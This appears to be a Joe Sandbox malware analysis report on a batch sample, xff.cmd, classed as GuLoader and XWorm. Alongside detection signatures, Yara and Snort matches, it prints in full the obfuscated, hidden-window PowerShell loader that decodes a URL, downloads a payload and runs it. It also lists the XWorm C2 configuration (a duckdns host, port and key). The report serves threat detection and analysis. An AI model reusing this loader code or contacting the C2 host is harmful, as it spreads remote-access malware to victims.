Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xff.cmd

Overview

General Information

Sample name:xff.cmd
Analysis ID:1446785
MD5:798c0f3c0c128497007a0616ef8d6b93
SHA1:cedbb573042a3275475973d0a6d45510a1941cd1
SHA256:76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6
Tags:cmd
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 4392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4904 cmdline: powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7340 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7776 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7860 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8172 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 7164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000C.00000002.1682604695.00000000080A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000C.00000002.1672297363.0000000005654000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000C.00000002.1682745414.000000000A8FD000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_4904.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7776.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe285:$b2: ::FromBase64String(
              • 0xd32d:$s1: -join
              • 0x13519:$s3: Reverse
              • 0x6ad9:$s4: +=
              • 0x6b9b:$s4: +=
              • 0xadc2:$s4: +=
              • 0xcedf:$s4: +=
              • 0xd1c9:$s4: +=
              • 0xd30f:$s4: +=
              • 0x173d3:$s4: +=
              • 0x17453:$s4: +=
              • 0x17519:$s4: +=
              • 0x17599:$s4: +=
              • 0x1776f:$s4: +=
              • 0x177f3:$s4: +=
              • 0xdb1a:$e4: Get-WmiObject
              • 0xdd09:$e4: Get-Process
              • 0xdd61:$e4: Start-Process
              • 0x15ee7:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8172, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772, ProcessId: 7164, ProcessName: WerFault.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnnes

              Snort Signatures

              Timestamp:05/23/24-21:09:07.075167
              SID:2855924
              Source Port:49720
              Destination Port:8895
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:10:13.764044
              SID:2853193
              Source Port:49720
              Destination Port:8895
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:11:06.119277
              SID:2852874
              Source Port:8895
              Destination Port:49720
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:11:06.119277
              SID:2852870
              Source Port:8895
              Destination Port:49720
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: nmds.duckdns.orgAvira URL Cloud: Label: malware
              Found malware configuration
